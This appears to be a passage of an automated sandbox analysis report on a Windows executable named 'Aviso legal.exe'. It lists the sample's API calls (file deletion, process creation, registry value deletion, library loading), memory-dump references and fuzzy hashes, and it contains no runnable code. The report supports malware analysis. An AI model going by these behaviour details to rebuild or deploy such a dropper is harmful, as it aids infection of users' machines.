                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                • String ID:
                                • API String ID: 334405425-0
                                • Opcode ID: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                • Opcode Fuzzy Hash: 0812a69665cf11e377adb3684f8a171474585e26745252b9346dd4e1bc3f05c7
                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                APIs
                                  • Part of subcall function 00406008: GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                  • Part of subcall function 00406008: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DE3), ref: 00405C1C
                                • DeleteFileW.KERNELBASE(?,?,?,00000000,00405DE3), ref: 00405C24
                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C3C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$Attributes$DeleteDirectoryRemove
                                • String ID:
                                • API String ID: 1655745494-0
                                • Opcode ID: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                • Instruction ID: 0274c5225d47ddc366315f3a2fda4b694ad97aa72442a0e2fcdbaf00fd257d87
                                • Opcode Fuzzy Hash: 8eed124eda4cbc8430ddba83c09443e031bc029d4ce3365f7fb32bc961faff32
                                • Instruction Fuzzy Hash: F4E0E53110CF9156E61457309E08F5F2AD8EF86715F05493EF892B10C0CBB848068E6A
                                APIs
                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID:
                                • API String ID: 3850602802-0
                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                APIs
                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 00402456
                                • RegCloseKey.ADVAPI32(00000000), ref: 0040245F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CloseDeleteValue
                                • String ID:
                                • API String ID: 2831762973-0
                                • Opcode ID: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                • Instruction ID: 30df5d2aec36195d54007c6df5f336708121daf1b93815cec1e8c6dbc8099d71
                                • Opcode Fuzzy Hash: b75d323d86fa909671316af8d9fa67dfe1c8e59de469e028d3815ce869cacf85
                                • Instruction Fuzzy Hash: 22F0C232A00120EBDB11ABB89B4DAED72A8AF84314F15443BE141B71C0DAFC5D01866D
                                APIs
                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$EnableShow
                                • String ID:
                                • API String ID: 1136574915-0
                                • Opcode ID: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                • Opcode Fuzzy Hash: 5ade1ed26a80a7dd8760c06c43378076533002221f41e68569be4ee1dd8de31a
                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                APIs
                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                • String ID:
                                • API String ID: 2547128583-0
                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                APIs
                                • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: File$AttributesCreate
                                • String ID:
                                • API String ID: 415043291-0
                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                APIs
                                • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                • GetLastError.KERNEL32 ref: 00405AFF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CreateDirectoryErrorLast
                                • String ID:
                                • API String ID: 1375471231-0
                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                APIs
                                • ReadFile.KERNELBASE(00000000), ref: 705B2C57
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: d35564401f2753be1f67541058d8f3f4f96d89215aa1b1b6618dbc3662c92648
                                • Instruction ID: 24a8fe4eaec7b2e938468b36b98e78917c21737544719e515dcbdef122ea01e8
                                • Opcode Fuzzy Hash: d35564401f2753be1f67541058d8f3f4f96d89215aa1b1b6618dbc3662c92648
                                • Instruction Fuzzy Hash: AE418F72504288EFDB5AAF65DD8AB5D3F74FB94350F30892AE505C6120DA3CBC819BB1
                                APIs
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: FileMove
                                • String ID:
                                • API String ID: 3562171763-0
                                • Opcode ID: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                • Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
                                • Opcode Fuzzy Hash: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
                                • Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E
                                APIs
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
                                  • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                  • Part of subcall function 00405B20: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
                                  • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB
                                  • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
